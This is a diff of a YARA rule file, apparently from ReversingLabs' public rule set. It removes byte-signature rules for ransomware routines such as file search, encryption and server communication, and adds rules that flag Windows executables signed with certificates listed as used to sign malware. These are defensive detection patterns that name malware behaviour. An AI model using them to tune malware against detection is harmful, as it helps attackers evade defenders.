-            8A 08 ?? ?? ?? 75 ?? 2B C6 50 57 8D ?? 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50
-            8B CF 51 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D 78 ?? 8A 08 40
-            3A CB 75 ?? 2B C7 8B C8 8D 51 ?? 83 E2 ?? B8 ?? ?? ?? ?? 2B C2 50 50 8D 7C 01 ?? 8D
-            84 0C ?? ?? ?? ?? 50 E8
-        }
-		$server_communication_4_1b_4 = {
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 94 24
-            ?? ?? ?? ?? 50 52 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            84 24 ?? ?? ?? ?? 3B C3 76 ?? 8B 8C 24 ?? ?? ?? ?? 50 51 8D 94 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 53 53 6A ?? 53 53 6A ?? 8D 84 24 ??
-            ?? ?? ?? 50 51 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 ?? 3B F3 0F 84 ?? ?? ?? ?? 6A ?? 8D
-            54 24 ?? 52 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 48
-            ?? 8B 40 ?? 53 68 ?? ?? ?? ?? 51 53 53 8D 94 24 ?? ?? ?? ?? 52 50 56 FF 15
-        }
-		$server_communication_4_1b_5 = {
-            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 8C
-            24 ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 15 ?? ?? ?? ?? 88 9C 04 ?? ??
-            ?? ?? 88 9C 04 ?? ?? ?? ?? 8B 42 ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 4C 24 ?? 51 FF D6 8B 7C 24 ?? 47 89 7C
-            24 ?? 83 FF ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15
-        }
-		$file_search_4_2_1 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ??
-            FF 70 ?? 8D 85 ?? ?? ?? ?? 50 FF D3 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
-        }
-		$file_search_4_2_2 = {
-            FF D3 8B 35 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 85 ?? ?? ?? ?? 50 FF D7 6A ?? 8D 45 ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            66 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51
-            6A ?? FF D3
-        }
-		$server_communication_4_2_1 = {
-            FF 15 ?? ?? ?? ?? 8B F0 0F 57 C0 8D 84 24 ?? ?? ?? ?? 66 0F 7F 84 24 ?? ?? ?? ?? 50
-            8D 84 24 ?? ?? ?? ?? 8B D6 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B CE E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            56 FF 15
-        }
-		$server_communication_4_2_2 = {
-            FF D7 8B 0D ?? ?? ?? ?? 8B D0 8B 49 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ??
-            50 FF D7
-        }
-		$server_communication_4_2_3 = {
-            6A ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 6A ?? 56 FF 54 24 ?? 8B 0D ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 41 ?? 50 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 71
-            ?? 56 FF 54 24
-        }
-		$server_communication_4_2_4 = {
-            FF 54 24 ?? 8B 44 24 ?? 66 C7 84 04 ?? ?? ?? ?? ?? ?? A1 ?? ?? ?? ?? FF 70 ?? 8D 84
-            24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 8B 7C 24 ?? FF D7 56 FF
-            D7
-        }
-		$server_communication_4_2_5 = {
-            57 8B 7C 24 ?? FF D7 56 FF D7 FF 74 24 ?? FF D7 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            6A ?? FF 15
-        }
-		$server_communication_3_1 = {
-            8A 08 40 3A CB 75 ?? 2B C7 50 8D 94 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? EB
-        }
-		$server_communication_3_2 = {
-            68 ?? ?? ?? ?? 88 9C 04 ?? ?? ?? ?? 51 88 9C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 57 8B 3D ?? ?? ?? ?? FF D7 56 FF D7 8B 7C 24 ?? 83 C7 ?? 89 7C 24 ??
-            81 FF ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 39 1D ?? ?? ??
-            ?? 75 ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15
-        }
-		$file_search_3_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? [0-1] 56 57 33 C0
-            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8
-        }
-		$file_search_3_1_1 = {
-            FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ??
-            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15
-        }
-		$file_search_3_1_2 = {
-            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ??
-            6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A
-            ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8
-        }
-		$file_search_3_2_1 = {
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ??
-            ?? ?? ?? 83 FF ?? 0F 85
-        }
-		$file_search_3_2_2 = {
-            8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ??
-            ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? FF D7 85 C0 74 ?? E8
-        }
-		$search_and_encrypt_3_1 = {
-            8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76
-            ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ??
-            ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
-        }
-		$search_and_encrypt_3_2 = {
-            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66
-            3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2
-            75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0
-            ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-        }
-		$search_and_encrypt_3_3 = {
-            1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53
-            8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ??
-            ?? ?? 68 ?? ?? ?? ?? ?? E8
-        }
-		$search_and_encrypt_3_4 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8
-            ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ??
-            ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Selig Michael Irfan" and pe.signatures [ i ] . serial == "45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8fc73b48-6797-558a-8265-9aca396e899f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14512-L14528"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAVERIS LIMITED" and pe.signatures [ i ] . serial == "37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "bf800655-cde4-59fa-9574-1055522fe074"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14530-L14546"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2 ) or ( $file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2 ) or ( $file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2 ) or ( $file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2 ) or ( $file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2 ) or ( $server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5 ) or ( $server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3 ) or ( $file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5 ) or ( $file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) or ( $server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "We Build Toolbars LLC" and pe.signatures [ i ] . serial == "43:21:de:10:73:82:78:b9:36:83:ca:54:24:07:f1:03" and 1367884800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Howareyou : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2A6B2Df210Be14F4E18E10C7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HowAreYou ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "998fbebe-099d-5779-ad4a-91b7b6c8ad6b"
-		date = "2021-06-14"
-		modified = "2021-06-14"
+		id = "150773ee-5d85-522d-a693-63bb6a7d1de2"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HowAreYou.yara#L1-L205"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "90568365aac61d120886f9efa9822ccc23df79a1a55e522c81db6e77477c4f04"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14548-L14564"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24ae1664c35b7947e2e638bf620d9ab572c70df9cdc1403cc00b422a45ff9194"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "HowAreYou"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 05 ??
-            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 0D ?? ??
-            ?? ?? 89 08 8B 05 ?? ?? ?? ?? 8D 0D ?? ?? ?? ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ??
-            8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 85 C9 74 ?? 74 ?? 8B 49
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 44 24
-            ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ??
-            ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24
-            C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ??
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B
-            4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05
-            ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1
-        }
-		$remote_connection_p2 = {
-            EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44
-            24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54
-            24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B
-            44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
-            ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C
-            24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8
-            ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-		$find_files_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54
-            24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ??
-            ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89
-            4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49
-            ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ??
-            ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B
-            4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ??
-            ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ??
-            ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
-            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
-            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11
-        }
-		$find_files_p2 = {
-            81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ??
-            ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ??
-            8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ??
-            ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89
-            F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ??
-            E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ??
-            ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
-            ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48
-            ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24
-            8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ??
-            89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B
-        }
-		$find_files_p3 = {
-            8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
